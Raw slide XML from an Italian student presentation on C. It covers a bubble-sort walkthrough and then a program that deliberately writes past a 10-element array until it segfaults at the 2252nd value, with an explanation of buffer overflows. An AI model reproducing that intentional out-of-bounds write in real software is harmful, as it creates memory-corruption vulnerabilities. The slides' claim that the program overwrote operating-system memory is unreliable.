          </a:p>
          <a:p>
            <a:pPr algn="just" marL="397255" indent="-198628" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2575"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>L'elemento successivo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>vector[k+1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, viene spostato in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>vector[k]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="397255" indent="-198628" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2575"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Il valore di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>swap_vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> viene inserito in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>vector[k+1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2575"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2575"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8702431" y="7323610"/>
            <a:ext cx="5805323" cy="629539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2575"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1839">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Infine, stampiamo nuovamente l'array tramite il ciclo for, che ora è stato ordinato in ordine crescente.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10654596">
            <a:off x="5784983" y="3390542"/>
            <a:ext cx="2094728" cy="617945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="617945" w="2094728">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2094727" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2094727" y="617944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="617944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10654596">
            <a:off x="5784983" y="7308135"/>
            <a:ext cx="2094728" cy="617945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="617945" w="2094728">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2094727" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2094727" y="617945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="617945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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2.2 - ESECUZIONE DEL PROGRAMMA</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8558768" y="819926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0" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10657601" y="1660447"/>
            <a:ext cx="3332724" cy="7619125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7619125" w="3332724">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3332724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3332724" y="7619125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7619125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="-58502" t="-13943" r="-338144" b="-15585"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10177719" y="2266784"/>
            <a:ext cx="453148" cy="2237767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2237767" w="453148">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="453147" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453147" y="2237767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22377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3" id="13"/>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14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2197154" y="3124683"/>
            <a:ext cx="7716260" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="3780"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inserimento dei numeri da parte dell’utente</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 15" id="15"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3092249" y="5152904"/>
            <a:ext cx="6821165" cy="941070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="3780"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Stampa del vettore nell’ordine inserito dall’utente</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 16" id="16"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3327979" y="7738434"/>
            <a:ext cx="6821165" cy="464820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3780"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Stampa del vettore in ordine crescente</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10177719" y="4533131"/>
            <a:ext cx="453148" cy="2237767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2237767" w="453148">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="453147" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453147" y="2237767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22377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177719" y="6867025"/>
            <a:ext cx="453148" cy="2237767"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2237767" w="453148">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="453147" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453147" y="2237767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22377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cover dir="l"/>
  </p:transition>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="4546672"/>
            <a:ext cx="15381560" cy="1659255"/>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2 - MODIFICA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> PROGRAMMA</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u"/>
  </p:transition>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3.1 -   MODIFICA DEL CODICE</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8558768" y="819926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0" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="864676" y="2061534"/>
            <a:ext cx="6413772" cy="474480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="474480" w="6413772">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6413772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6413772" y="474479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="474479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-1100715"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="1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2" id="1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13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7615310" y="5966324"/>
            <a:ext cx="8791132" cy="3629745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2603"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1859">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Oltre alla libreria stdio.h, includiamo anche stdlib.h per utilizzare la funzione rand(). Nel corpo della funzione main, dichiariamo tutte le variabili necessarie, inclusa il vettore vector di dimensione 10. Questa volta utilizziamo un ciclo for per inserire elementi casuali nel vettore fino a quando il contatore i è minore di 1000000 o fino a quando si verifica un errore di segmentation fault. Questo errore si verifica quando il programma tenta di accedere a una zona di memoria a cui non ha accesso. Vedremo questo comportamento più dettagliatamente nella prossima sezione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2603"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2603"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2603"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 14" id="14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="864676" y="2756736"/>
            <a:ext cx="6413772" cy="5048272"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5048272" w="6413772">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6413772" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6413772" y="5048273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5048273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-12853" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 15" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="864676" y="2521597"/>
            <a:ext cx="178221" cy="303633"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="303633" w="178221">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="178221" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178221" y="303633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="303633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="-134451" r="-3498781" b="-1641875"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1042897" y="2521597"/>
            <a:ext cx="6235551" cy="235139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="235139" w="6235551">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6235551" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6235551" y="235139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="235139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="-2013" t="-273689" r="0" b="-2029304"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 17" id="17"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7615310" y="1896513"/>
            <a:ext cx="8791132" cy="3877046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2604"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1860">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Un buffer overflow si verifica quando vengono inseriti più dati di quelli che il buffer è in grado di gestire, causando così la sovrascrittura della memoria oltre i limiti del buffer. In questo specifico caso, se inseriamo più di 10 elementi nel vettore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1860">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1860">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, sovrascriviamo la memoria oltre la dimensione allocata per il vettore, causando un comportamento indefinito del programma.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2604"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1860">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Questa sovrascrittura potrebbe influenzare altre variabili o dati presenti nella memoria circostante, inclusi i metadati di allocazione della memoria stessa. Se la sovrascrittura raggiunge aree di memoria sensibili o riservate, ad esempio aree di memoria del sistema operativo o di altre parti critiche del programma, potrebbe causare un errore di segmentazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1860">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>(segmentation fault)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1860">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> o addirittura un comportamento imprevedibile del sistema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2604"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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3.2 - SEGMENTATION FAULT</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9281632" y="8807433"/>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0" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1167714" y="1781079"/>
            <a:ext cx="5259493" cy="7026354"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7026354" w="5259493">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5259493" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5259493" y="7026354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7026354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1026372" y="8651364"/>
            <a:ext cx="4945927" cy="197837"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="197837" w="4945927">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4945927" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4945927" y="197837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="197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271960">
            <a:off x="5169559" y="7149702"/>
            <a:ext cx="2726673" cy="528293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="528293" w="2726673">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2726673" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2726673" y="528293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5282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4" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8057109" y="2156783"/>
            <a:ext cx="9643990" cy="7981950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3639"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2599">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Durante l'esecuzione del programma, sono state sovrascritte altre parti della memoria del sistema fino a raggiungere l'ultimo spazio di memoria sovrascrivibile, ovvero fino all'inserimento del 2251º numero. Al 2252º, si verifica un errore di segmentation fault perché non è più possibile effettuare sovrascritture oltre quel punto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3639"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3639"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2599">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In sostanza, quando si tenta di inserire il 2252º numero nel vettore, il programma tenta di accedere a una zona di memoria a cui non ha il permesso di scrivere, causando così l'errore di segmentation fault. Questo accade perché il sistema operativo impedisce al programma di continuare a scrivere oltre i limiti consentiti della memoria, al fine di proteggere l'integrità del sistema e prevenire eventuali danni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3219"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4759"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
